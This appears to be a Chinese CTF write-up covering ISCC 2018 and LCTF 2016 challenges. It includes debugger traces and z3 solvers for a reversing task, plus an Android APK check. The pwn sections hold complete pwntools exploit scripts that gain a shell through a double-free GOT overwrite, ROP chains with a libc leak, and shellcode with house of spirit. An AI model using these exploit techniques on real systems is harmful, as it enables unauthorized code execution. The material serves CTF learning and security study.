Breakpoint 2, 0x0000000000400906 in fencode () edx 0xffffffff -1 esi 0x33 51 eax 0xffffff8b -117 ecx 0x7f 127 Breakpoint 1, 0x00000000004008c6 in fencode () edx 0x1 1 esi 0x30 48 eax 0xffffdfe0 -8224 ecx 0x0 0 Breakpoint 1, 0x00000000004008c6 in fencode () edx 0x1 1 esi 0x31 49 eax 0xffffdfe0 -8224 ecx 0x1 1 Breakpoint 1, 0x00000000004008c6 in fencode () edx 0x3 3 esi 0x32 50 eax 0xffffdfe0 -8224 ecx 0x2 2 Breakpoint 1, 0x00000000004008c6 in fencode () edx 0xfffffffd -3 esi 0x33 51 eax 0xffffdfe0 -8224 ecx 0x3 3 Breakpoint 2, 0x0000000000400906 in fencode () edx 0x0 0 esi 0x33 51 eax 0x5e 94 ecx 0x7f 127 Breakpoint 1, 0x00000000004008c6 in fencode () edx 0xffffffff -1 esi 0x30 48 eax 0xffffdfe0 -8224 ecx 0x0 0 Breakpoint 1, 0x00000000004008c6 in fencode () edx 0xfffffffe -2 esi 0x31 49 eax 0xffffdfe0 -8224 ecx 0x1 1 Breakpoint 1, 0x00000000004008c6 in fencode () edx 0xfffffffd -3 esi 0x32 50 eax 0xffffdfe0 -8224 ecx 0x2 2 Breakpoint 1, 0x00000000004008c6 in fencode () edx 0x4 4 esi 0x33 51 eax 0xffffdfe0 -8224 ecx 0x3 3 Breakpoint 2, 0x0000000000400906 in fencode () edx 0xffffffff -1 esi 0x33 51 eax 0xffffffa4 -92 ecx 0x7f 127 Breakpoint 1, 0x00000000004008c6 in fencode () edx 0xffffffff -1 esi 0x30 48 eax 0xffffdfe0 -8224 ecx 0x0 0 Breakpoint 1, 0x00000000004008c6 in fencode () edx 0x0 0 esi 0x31 49 eax 0xffffdfe0 -8224 ecx 0x1 1 Breakpoint 1, 0x00000000004008c6 in fencode () edx 0xfffffffe -2 esi 0x32 50 eax 0xffffdfe0 -8224 ecx 0x2 2 Breakpoint 1, 0x00000000004008c6 in fencode () edx 0x2 2 esi 0x33 51 eax 0xffffdfe0 -8224 ecx 0x3 3 Breakpoint 2, 0x0000000000400906 in fencode () edx 0xffffffff -1 esi 0x33 51 eax 0xffffffd2 -46 ecx 0x7f 127 Breakpoint 1, 0x00000000004008c6 in fencode () edx 0x2 2 esi 0x34 52 eax 0xffffdfe0 -8224 ecx 0x4 4 Breakpoint 1, 0x00000000004008c6 in fencode () edx 0x2 2 esi 0x35 53 eax 0xffffdfe0 -8224 ecx 0x5 5 Breakpoint 1, 0x00000000004008c6 in fencode () edx 0x4 4 esi 0x36 54 eax 0xffffdfe0 -8224 ecx 0x6 6 Breakpoint 1, 0x00000000004008c6 in fencode () edx 0xfffffffb -5 esi 0x37 55 eax 0xffffdfe0 -8224 ecx 0x7 7 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ───────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────── RAX 0x7fffffffdfe0 ◂— 0x3736353433323130 ('01234567') RBX 0x0 *RCX 0x7 *RDX 0xfffffffb RDI 0x4 *RSI 0x37 R8 0x4 R9 0x3 R10 0x309 R11 0x7ffff7aba620 (strlen) ◂— pxor xmm0, xmm0 R12 0x400540 (_start) ◂— xor ebp, ebp R13 0x7fffffffe130 ◂— 0x1 R14 0x0 R15 0x0 RBP 0x7fffffffdd70 —▸ 0x7fffffffe050 —▸ 0x400f80 (__libc_csu_init) ◂— push r15 RSP 0x7fffffffdcf0 ◂— 0x7f RIP 0x4008c6 (fencode+646) ◂— imul edx, esi ────────────────────────────────────────────────[ DISASM ]───────────────────────────────────────────────── ► 0x4008c6 <fencode+646> imul edx, esi 0x4008c9 <fencode+649> add edx, dword ptr [rbp - 0x30] 0x4008cc <fencode+652> mov dword ptr [rbp - 0x30], edx 0x4008cf <fencode+655> mov dword ptr [rbp - 0x38], 0x9dd488f1 0x4008d6 <fencode+662> jmp fencode+837 <0x400985> ↓ 0x400985 <fencode+837> jmp fencode+46 <0x40066e> ↓ 0x40066e <fencode+46> mov eax, dword ptr [rbp - 0x38] 0x400671 <fencode+49> mov ecx, eax 0x400673 <fencode+51> sub ecx, 0x8062cb11 0x400679 <fencode+57> mov dword ptr [rbp - 0x3c], eax 0x40067c <fencode+60> mov dword ptr [rbp - 0x40], ecx ─────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────── 00:0000│ rsp 0x7fffffffdcf0 ◂— 0x7f 01:0008│ 0x7fffffffdcf8 ◂— 0x17d7ac49 02:0010│ 0x7fffffffdd00 ◂— 0x11a641770d02b5ce 03:0018│ 0x7fffffffdd08 ◂— 0x2f898fb01bb32d79 04:0020│ 0x7fffffffdd10 ◂— 0x32c3f3ba 05:0028│ 0x7fffffffdd18 ◂— 0x4870988c47f6f166 06:0030│ 0x7fffffffdd20 ◂— 0x70828a986929cc5d 07:0038│ 0x7fffffffdd28 ◂— 0x82e883408157c147 ───────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────── ► f 0 4008c6 fencode+646 f 1 400eb5 main+229 f 2 7ffff7a5a2b1 __libc_start_main+241 Breakpoint *0x4008c6 pwndbg>
v9 = v22; v10 = v22 + 1; output[v9] = ALPHA_BASE[(v20 >> 2) & 0x3F]; v11 = v10++; output[v11] = ALPHA_BASE[(((v20 & 0xFF) >> 4) | 16 * v20) & 0x3F]; output[v10] = ALPHA_BASE[(((v20 & 0xFF) >> 6) | 4 * v20) & 0x3F]; v12 = v10 + 1; v22 = v10 + 2; output[v12] = ALPHA_BASE[v20 & 0x3F];
類base64是可解的,所以能夠先對給定的字符串解類base64,而後對解類base64的結果再解一個四元的方程組便可,不學線代多年,第一反應就是爆破= =,(127 - 32) ^ 4數據量也不大,爆破的話,大概100s左右就能出結果,後來發現用z3更快,z3的話只需0.5s就能夠出結果,爆破和z3求解的腳本都放在下邊了
ISCC2018_re250 [master●●] cat solve.py #!/usr/bin/env python # -*- coding: utf-8 -*- __Auther__ = 'M4x' from z3 import * from libnum import s2n from itertools import permutations from ctypes import c_int32 table = '''FeVYKw6a0lDIOsnZQ5EAf2MvjS1GUiLWPTtH4JqRgu3dbC8hrcNo9/mxzpXBky7+\x00''' def decodeBase64(src): delPaddingTail = {0: 0, 2: 4, 1: 2} value = '' n = src.count('=') sin = src[:len(src) - n] for c in sin: value += bin(table.find(c))[2:].zfill(6) value = value[:len(value) - delPaddingTail[n]] # print value middle = [] for i in range(8, len(value) + 1, 8): middle.append(int(value[i-8:i], 2)) output = middle out = hex(s2n(''.join(map(chr, output))))[2: -1] # print out return out m =[ 2, 2, 4, 4294967291, 1, 1, 3, 4294967293, 4294967295, 4294967294, 4294967293, 4, 4294967295, 0, 4294967294, 2 ] # m = [c_int32(i).value for i in m] # print m f0 = lambda x: int(x, 16) f1 = lambda x1, x2, x3, x4: (x1 * m[0] + x2 * m[1] + x3 * m[2] + x4 * m[3]) & 0xff f2 = lambda x1, x2, x3, x4: (x1 * m[4] + x2 * m[5] + x3 * m[6] + x4 * m[7]) & 0xff f3 = lambda x1, x2, x3, x4: (x1 * m[8] + x2 * m[9] + x3 * m[10] + x4 * m[11]) & 0xff f4 = lambda x1, x2, x3, x4: (x1 * m[12] + x2 * m[13] + x3 * m[14] + x4 * m[15]) & 0xff crypto = '''lUFBuT7hADvItXEGn7KgTEjqw8U5VQUq''' key = decodeBase64(crypto) key = [f0(key[i: i + 2]) for i in range(0, len(key), 2)] # key = [key[i: i + 4] for i in range(0, len(key), 4)] # print key s = Solver() res = [BitVec(str(i), 16) for i in xrange(24)] for i in res: s.add(And(i > 0, i < 256)) for i in xrange(6): s.add(f1(res[4 * i + 0], res[4 * i + 1], res[4 * i + 2], res[4 * i + 3]) == key[i * 4 + 0]) s.add(f2(res[4 * i + 0], res[4 * i + 1], res[4 * i + 2], res[4 * i + 3]) == key[i * 4 + 1]) s.add(f3(res[4 * i + 0], res[4 * i + 1], res[4 * i + 2], res[4 * i + 3]) == key[i * 4 + 2]) s.add(f4(res[4 * i + 0], res[4 * i + 1], res[4 * i + 2], res[4 * i + 3]) == key[i * 4 + 3]) while s.check() == sat: print s.model() flag = "" for i in xrange(24): flag += chr(s.model()[res[i]].as_long() & 0xff) print flag s.add(res[0] != s.model()[res[0]]) else: print "Finish" # print flag # flag = [] # dic = range(32, 127)[::-1] # for a in dic: # for b in dic: # for c in dic: # for d in dic: # if [f1(a, b, c, d), f2(a, b, c, d), f3(a, b, c, d), f4(a, b, c, d)] in key: # flag.append("".join(map(chr, (a, b, c, d)))) # if len(flag) == 6: # All = permutations(flag) # # print All # for x, y, z, r, s, t in All: # t = x + y + z + r + s + t # if t.startswith("flag{") and t.endswith("}"): # print t # exit() # flag{dO_y0U_KNoW_0IlVm?}
這題的流程經過main函數能夠看出,輸入的字符串通過fencode和encode兩次加密後與字符串lUFBuT7hADvItXEGn7KgTEjqw8U5VQUq 比較,相等即正確。
//v17 = a1[v8] v20 = a1[v6] v21 = a1[v5] //v23即a3起始的下標 v5 = 0 v6 = 1 v8 = 2 v23 = 0 v9 = 0 v11 = 1 v10 = 2 v12 = 3 v5 = 3 v6 = 4 v8 = 5 v23 = 4 v9 = 4 v11 = 5 v10 = 6 v12 = 7 v5 = 6 v6 = 7 v8 = 8 v23 = 8 v9 = 8 v11 = 9 v10 = 10 v12 = 11 v5 = 9 v6 = 10 v8 = 11 v23 = 12 v9 = 12 v11 = 13 v10 = 14 v12 = 15 v5 = 12 v6 = 13 v8 = 14 v23 = 16 v9 = 16 v11 = 17 v10 = 18 v12 = 19 v5 = 15 v6 = 16 v8 = 17 v23 = 20 v9 = 20 v11 = 21 v10 = 22 v12 = 23 v5 = 18 v6 = 19 v8 = 20 v23 = 24 v9 = 24 v11 = 25 v10 = 26 v12 = 27 v5 = 21 v6 = 22 v8 = 23 v23 = 28 v9 = 28 v11 = 29 v10 = 30 v12 = 31
from z3 import * ALPHA_BASE = 'FeVYKw6a0lDIOsnZQ5EAf2MvjS1GUiLWPTtH4JqRgu3dbC8hrcNo9/mxzpXBky7+' s1 = 'lUFBuT7hADvItXEGn7KgTEjqw8U5VQUq' #print len(s1) xiabiao = [] for i in s1: for j in range(len(ALPHA_BASE)): if i == ALPHA_BASE[j]: xiabiao.append(j) print xiabiao #v21 = v6[0] v20 = v6[1] v17 = v6[2] #v6 = [37, 192, 59, 166, 31, 175, 76, 165, 203, 139, 164, 155, 59, 225, 40, 133, 38, 38, 22, 231, 17, 9, 7, 38] def decode(): v6 = [] x = BitVec('x',16) y = BitVec('y',16) z = BitVec('z',16) for i in range(8): s = Solver() s.add( And( x > 0, x < 256, y > 0, y < 256, z > 0, z < 256 ) ) s.add( And( ((x>> 2) & 0x3F) == xiabiao[i*4] , ((((y & 0xFF) >> 4) | 16 * x) & 0x3F) == xiabiao[i*4+1] , ((((z & 0xFF) >> 6) | 4 * y) & 0x3F) == xiabiao[i*4+2] , (z & 0x3F) == xiabiao[i*4+3] ) ) if s.check() == sat: print s.model() v6.append(s.model()[x].as_long()) v6.append(s.model()[y].as_long()) v6.append(s.model()[z].as_long()) else: print 'fail' print(len(v6),v6) return v6 v6 = decode() print v6
例:a2[0] = (a1[0]*m[0]+...+a1[3]*m[3])%127
a2[1] = (a1[0]*m[4]+...+a1[3]*m[7])%127
a2[2] = (a1[0]*m[8]+...+a1[3]*m[11])%127
a2[3] = (a1[0]*m[12]+...+a1[3]*m[15])%127
#!/usr/bin/python # -*- coding: utf-8 -*- __Author__ = "LB@" from z3 import * ALPHA_BASE = 'FeVYKw6a0lDIOsnZQ5EAf2MvjS1GUiLWPTtH4JqRgu3dbC8hrcNo9/mxzpXBky7+' s1 = 'lUFBuT7hADvItXEGn7KgTEjqw8U5VQUq' #print len(s1) xiabiao = [] for i in s1: for j in range(len(ALPHA_BASE)): if i == ALPHA_BASE[j]: xiabiao.append(j) print xiabiao #v21 = v6[0] v20 = v6[1] v17 = v6[2] #v6 = [37, 192, 59, 166, 31, 175, 76, 165, 203, 139, 164, 155, 59, 225, 40, 133, 38, 38, 22, 231, 17, 9, 7, 38] def decode(): v6 = [] x = BitVec('x',16) y = BitVec('y',16) z = BitVec('z',16) for i in range(8): s = Solver() s.add( And( x > 0, x < 256, y > 0, y < 256, z > 0, z < 256 ) ) s.add( And( ((x>> 2) & 0x3F) == xiabiao[i*4] , ((((y & 0xFF) >> 4) | 16 * x) & 0x3F) == xiabiao[i*4+1] , ((((z & 0xFF) >> 6) | 4 * y) & 0x3F) == xiabiao[i*4+2] , (z & 0x3F) == xiabiao[i*4+3] ) ) if s.check() == sat: print s.model() v6.append(s.model()[x].as_long()) v6.append(s.model()[y].as_long()) v6.append(s.model()[z].as_long()) else: print 'fail' print(len(v6),v6) return v6 def fdecode(): a = [] x = BitVec('x',64) y = BitVec('y',64) z = BitVec('z',64) w = BitVec('w',64) for i in range(6): s = Solver() s.add( And( x > 0, x < 128, y > 0, y < 128, z > 0, z < 128, w > 0, w < 128) ) s.add( (x*m[0] + y*m[1] + z*m[2] + w*m[3])%256 == v6[i*4] ) s.add( (x*m[4] + y*m[5] + z*m[6] + w*m[7])%256 == v6[i*4+1] ) s.add( (x*m[8] + y*m[9] + z*m[10] + w*m[11])%256 == v6[i*4+2] ) s.add( (x*m[12] + y*m[13] + z*m[14] + w*m[15])%256 == v6[i*4+3] ) if s.check() == sat: print s.model() a.append(s.model()[x].as_long()) a.append(s.model()[y].as_long()) a.append(s.model()[z].as_long()) a.append(s.model()[w].as_long()) else: print 'fail' return a v6 = decode() m = [0x2,0x2,0x4,0xFFFFFFFB,0x1,0x1,0x3,0x0FFFFFFFD,0x0FFFFFFFF,0x0FFFFFFFE,0x0FFFFFFFD,0x4,0x0FFFFFFFF,0x0,0x0FFFFFFFE,0x2] a = fdecode() #a = [102, 108, 97, 103, 123, 100, 79, 95, 121, 48, 85, 95, 75, 78, 111, 87, 95, 48, 73, 108, 86, 109, 63, 125] #print a flag = [ chr(i) for i in a ] print ''.join(flag) #flag{dO_y0U_KNoW_0IlVm?}
64位動態連接的程序,沒有開啓PIE和RELRO保護,意味着got表地址是固定的而且可寫,分析程序後,發現free時只對下標作了驗證,存在double free的漏洞,而且程序沒有咱們可控的輸出,所以也就不能leak libc了,看起來只有overwrite got這一條路可走了,同時也發現了存在gg函數能夠直接get shell,所以思路就是覆寫某個got爲gg的地址了,咱們先調試看一下got附近有沒有合適的size
double free的原理能夠看這個slide
注意只有運行過某函數時,該函數的got地址纔會爲真實地址 pwndbg> telescope 0x602000 20 00:0000│ 0x602000 (_GLOBAL_OFFSET_TABLE_) —▸ 0x601e28 (_DYNAMIC) ◂— 0x1 01:0008│ 0x602008 (_GLOBAL_OFFSET_TABLE_+8) —▸ 0x7f5fa9e77170 ◂— 0x0 02:0010│ 0x602010 (_GLOBAL_OFFSET_TABLE_+16) —▸ 0x7f5fa9c67ca0 (_dl_runtime_resolve_avx_slow) ◂— vorpd ymm8, ymm1, ymm0 03:0018│ 0x602018 (free@got.plt) —▸ 0x7f5fa992e4e0 (free) ◂— mov rax, qword ptr [rip + 0x31da11] 04:0020│ 0x602020 (puts@got.plt) —▸ 0x7f5fa991bf60 (puts) ◂— push r13 05:0028│ 0x602028 (fread@got.plt) —▸ 0x7f5fa991aa10 (fread) ◂— push r13 06:0030│ 0x602030 (__stack_chk_fail@got.plt) —▸ 0x400746 (__stack_chk_fail@plt+6) ◂— push 3 07:0038│ 0x602038 (system@got.plt) —▸ 0x400756 (system@plt+6) ◂— push 4 08:0040│ 0x602040 (printf@got.plt) —▸ 0x7f5fa9902160 (printf) ◂— sub rsp, 0xd8 09:0048│ 0x602048 (__libc_start_main@got.plt) —▸ 0x7f5fa98d31c0 (__libc_start_main) ◂— push r14 0a:0050│ 0x602050 (__gmon_start__@got.plt) —▸ 0x400786 (__gmon_start__@plt+6) ◂— push 7 0b:0058│ 0x602058 (strtol@got.plt) —▸ 0x7f5fa98e9c40 (strtoq) ◂— mov rax, qword ptr [rip + 0x362189] 0c:0060│ 0x602060 (malloc@got.plt) —▸ 0x7f5fa992dee0 (malloc) ◂— push rbp 0d:0068│ 0x602068 (setvbuf@got.plt) —▸ 0x7f5fa991c720 (setvbuf) ◂— push r13 0e:0070│ 0x602070 (__isoc99_scanf@got.plt) —▸ 0x7f5fa9917e80 (__isoc99_scanf) ◂— push rbx 0f:0078│ 0x602078 (exit@got.plt) —▸ 0x4007d6 (exit@plt+6) ◂— push 0xc /* 'h\x0c' */ 10:0080│ 0x602080 (data_start) ◂— 0x0 ... ↓ pwndbg>
看起來在執行過add_paper這個功能後,有0x602000+2, 0x602030+2, 0x602038+2,0x602050+2四處地址能夠提供合適的size,但選擇0x602000+2的話,同時會修改,_GLOBAL_OFFSET_TABLE_的值,形成不可預知的後果,0x602038+2,0x602050+2也會由於函數執行前後順序的關係形成程序crash,能夠選擇0x602030+2做爲chunk的首地址,此時的size(0x602030+2+8)爲0x????????00000040,能夠經過malloc的驗證,user data段從0x602030+2+0x10開始,能夠覆寫strtol@got爲gg的地址,進而get shell
pwndbg> x/8gx 0x602030+2 0x602032 <__stack_chk_fail@got.plt+2>: 0x0756000000000040 0xa160000000000040 0x602042 <printf@got.plt+2>: 0xb1c000007f2cd78b 0x078600007f2cd788 0x602052 <__gmon_start__@got.plt+2>: 0x1c40000000000040 0x5ee000007f2cd78a 0x602062 <malloc@got.plt+2>: 0x472000007f2cd78e 0xfe8000007f2cd78d pwndbg> 這須要咱們控制malloc的參數爲0x40-0x10
Desktop cat exp.py #!/usr/bin/env python # -*- coding: utf-8 -*- __Auther__ = 'M4x' from pwn import * from time import sleep import sys context.terminal = ["deepin-terminal", "-x", "sh", "-c"] elf = ELF("./pwn3") if sys.argv[1] == "l": context.log_level = "debug" # env = {'LD_PRELOAD': ''} # io = process("", env = env) io = process("./pwn3") libc = elf.libc else: io = remote("", 8999) # libc = ELF("") def DEBUG(): raw_input("DEBUG: ") gdb.attach(io, "b *0x400B26") def add(idx, length, content): io.sendlineafter("2 delete paper\n", "1") sleep(0.01) io.sendlineafter(":", str(idx)) sleep(0.01) io.sendlineafter(":", str(length)) sleep(0.01) io.sendlineafter(":", content) sleep(0.01) def delete(idx): io.sendlineafter("2 delete paper\n", "2") sleep(0.01) io.sendlineafter(":", str(idx)) sleep(0.01) if __name__ == "__main__": fakeChunk = 0x602030+2 add(0, 0x30, '0000') add(1, 0x30, '1111') delete(0) # 0 delete(1) # 1 -> 0 delete(0) # 0 -> 1 -> 0 add(0, 0x30, p64(fakeChunk)) # 1 -> 0 -> fakeChunk add(1, 0x30, '1111') # 0 -> fakeChunk add(2, 0x30, '2222') # fakeChunk # payload = 'aaaaaaaabbbbbbbbccccccccdddddddd' payload = p8(0) * (3 * 8 - 2) + p64(elf.sym['gg']) * 2 # DEBUG() add(3, 0x30, payload) io.sendlineafter("2 delete paper\n", "2") # trigger strtol # delete(0) io.interactive() io.close() # flag{ISCC_SoEasy}
double free的模板題,並不難
64位動態連接的程序,沒有開啓canary和PIE,看起來能夠暴力棧溢出了,經過分析Menu函數中輸入choice時存在棧溢出,而且程序中有system函數,這樣就能夠控制Menu函數返回到system了,但要執行system("/bin/sh")的話還須要控制rdi指向/bin/sh,常規的思路是經過rop控制write函數將/bin/sh寫到bss或者data等固定地址,但這裏由於程序中有flu sh函數,所以必然存在sh字符串,直接控制便可
Desktop cat iscc_pwn200_1.py #!/usr/bin/env python # -*- coding: utf-8 -*- __Auther__ = 'M4x' from pwn import * from time import sleep import sys context.arch = 'amd64' context.log_level = "debug" context.terminal = ["deepin-terminal", "-x", "sh", "-c"] elf = ELF("./pwn50") if sys.argv[1] == "l": # env = {'LD_PRELOAD': ''} # io = process("", env = env) io = process("./pwn50") libc = elf.libc else: io = remote("", 9000) # libc = ELF("") def DEBUG(): raw_input("DEBUG: ") gdb.attach(io) if __name__ == '__main__': popRdi = 0x0000000000400b03 io.sendlineafter(': ', 'guest') io.sendlineafter(': ', 'guest') # ROPgadget --binary ./pwn50 --string sh payload = flat([cyclic(0x50 + 0x8), popRdi, 0x0000000000400407, elf.plt['system']]) io.sendlineafter(": ", payload) io.sendlineafter(": ", '3') io.interactive() io.close() Desktop cat iscc_pwn200_2.py #!/usr/bin/env python # -*- coding: utf-8 -*- __Auther__ = 'M4x' from pwn import * from time import sleep import sys context.arch = 'amd64' context.log_level = "debug" context.terminal = ["deepin-terminal", "-x", "sh", "-c"] elf = ELF("./pwn50") if sys.argv[1] == "l": # env = {'LD_PRELOAD': ''} # io = process("", env = env) io = process("./pwn50") libc = elf.libc else: io = remote("", 9000) libc = ELF("./libc6_2.19-0ubuntu6.14_amd64.so") oneGadgetOffset = 0x46428 oneGadgetOffset = 0x4647c oneGadgetOffset = 0xe9415 oneGadgetOffset = 0xea36d def DEBUG(): raw_input("DEBUG: ") gdb.attach(io) popRdi = 0x0000000000400b03 if __name__ == "__main__": io.sendlineafter(': ', 'guest') io.sendlineafter(': ', 'guest') payload = flat([cyclic(0x50 + 8), popRdi, elf.got['puts'], elf.plt['puts'], popRdi, elf.got['read'], elf.plt['puts'], elf.sym['Menu']]) io.sendlineafter(": ", payload) io.sendlineafter(": ", '3') putsAddr = u64(io.recvuntil('\x7f')[-6: ].ljust(8, '\x00')) success('putsAddr -> {:#x}'.format(putsAddr)) readAddr = u64(io.recvuntil('\x7f')[-6: ].ljust(8, '\x00')) success('readAddr -> {:#x}'.format(readAddr)) libcBase = readAddr - libc.sym['read'] success('libcBase -> {:#x}'.format(libcBase)) pause() oneGadget = libcBase + 0x46428 payload = flat([cyclic(0x50 + 0x8), popRdi, libcBase + next(libc.search('/bin/sh')), libcBase + libc.sym['system'], 0xdeadbeef]) # DEBUG() io.sendlineafter(": ", payload) io.sendlineafter(": ", '3') io.interactive() io.close() # flag{welcome_to_iscc}
lctf2016_pwn200 [master●] cat solve.py #!/usr/bin/env python # -*- coding: utf-8 -*- __Auther__ = 'M4x' from pwn import * context.terminal = ['deepin-terminal', '-x', 'sh', '-c'] context(arch = 'amd64', os = 'linux', log_level = 'debug') io = process("./pwn200") io.sendafter("?\n", '0' * 48) rbpAddr = u64(io.recvuntil("\x7f")[-6: ].ljust(8, '\x00')) success("rbpAddr -> {:#x}".format(rbpAddr)) # raw_input("DEBUG: ") # gdb.attach(io) io.sendlineafter("?\n", "0") payload = p64(rbpAddr - 0xb8) + asm(shellcraft.execve("/bin/sh")) payload = payload.ljust(0x40 - 8, '\x90') payload += p64(0x0000000000602030) io.sendafter("~\n", payload) io.interactive() io.close()
預期解是使用house of spirit這種攻擊方法,house of spirit的基本思想是棧上溢出的長度不夠覆蓋到ret,但足夠覆蓋某些堆指針時,能夠改寫該堆指針並僞造chunk,經過free將該僞造的chunk添加進bin,進而控制咱們下一次malloc的地址,固然這須要經過一些檢查,具體細節能夠看這個slide
lctf2016_pwn200 [master●] cat hos.py #!/usr/bin/env python # -*- coding: utf-8 -*- __Auther__ = 'M4x' from pwn import * context(log_level = 'debug', arch = 'amd64', os = 'linux') context.terminal = ["deepin-terminal", '-x', 'sh', '-c'] def DEBUG(): raw_input("DEBUG: ") gdb.attach(io) io = process("./pwn200") # who are u? sc = asm(shellcraft.execve("/bin/sh")) io.sendafter("?\n", sc.ljust(48, '0')) rbpAddr = u64(io.recvuntil("\x7f")[-6: ].ljust(8, '\x00')) success("rbpAddr -> {:#x}".format(rbpAddr)) scAddr = rbpAddr - 0x50 fakeChunk = rbpAddr - 0x90 # give me your id io.sendlineafter("?\n", str(0x20)) # id # give me money payload = p64(0) * 5 + p64(0x41) payload = payload.ljust(0x40 - 8, '\x00') + p64(fakeChunk) io.sendlineafter("~\n", payload) # free io.sendlineafter(": ", "2") # malloc io.sendlineafter(": ", "1") io.sendlineafter("?\n", str(0x30)) payload = 'a' * 0x18 + p64(scAddr) payload = payload.ljust(48, '\x00') io.send(payload) # ret io.sendlineafter(": ", "3") io.interactive() io.close()
Desktop apktool d crack.apk Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=gasp I: Using Apktool 2.2.3-dirty on crack.apk I: Loading resource table... I: Decoding AndroidManifest.xml with resources... I: Loading resource table from file: /home/m4x/.local/share/apktool/framework/1.apk I: Regular manifest package... I: Decoding file-resources... I: Decoding values */* XMLs... I: Baksmaling classes.dex... I: Copying assets and libs... I: Copying unknown files... I: Copying original files... Desktop cd crack/assets assets ls bfsprotect.jar newDex.jar reverse.py assets file bfsprotect.jar bfsprotect.jar: Dalvik dex file version 035
assets file bfsprotect.jar bfsprotect.jar: Dalvik dex file version 035 assets dex2jar ./bfsprotect.jar Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=gasp ./bfsprotect-dex2jar.jar exists, use --force to overwrite assets file bfsprotect-dex2jar.jar bfsprotect-dex2jar.jar: Zip archive data, at least v1.0 to extract
public void onClick(View paramAnonymousView) { paramAnonymousView = MainActivity.this.editText.getText().toString(); if (!new ProtectClass().protectMethod(paramAnonymousView)) { Toast.makeText(MainActivity.this, "Wrong Flag", 0).show(); return; } Toast.makeText(MainActivity.this, "Correct Flag", 0).show(); }
public boolean protectMethod(String paramString) { int i = 0; for (;;) { if (i >= MainActivity.runTimes >> 1) { return paramString.equals("BFS-ISCC"); } if ("123456".equals("123456")) {} i += 1; } }
做者: LB919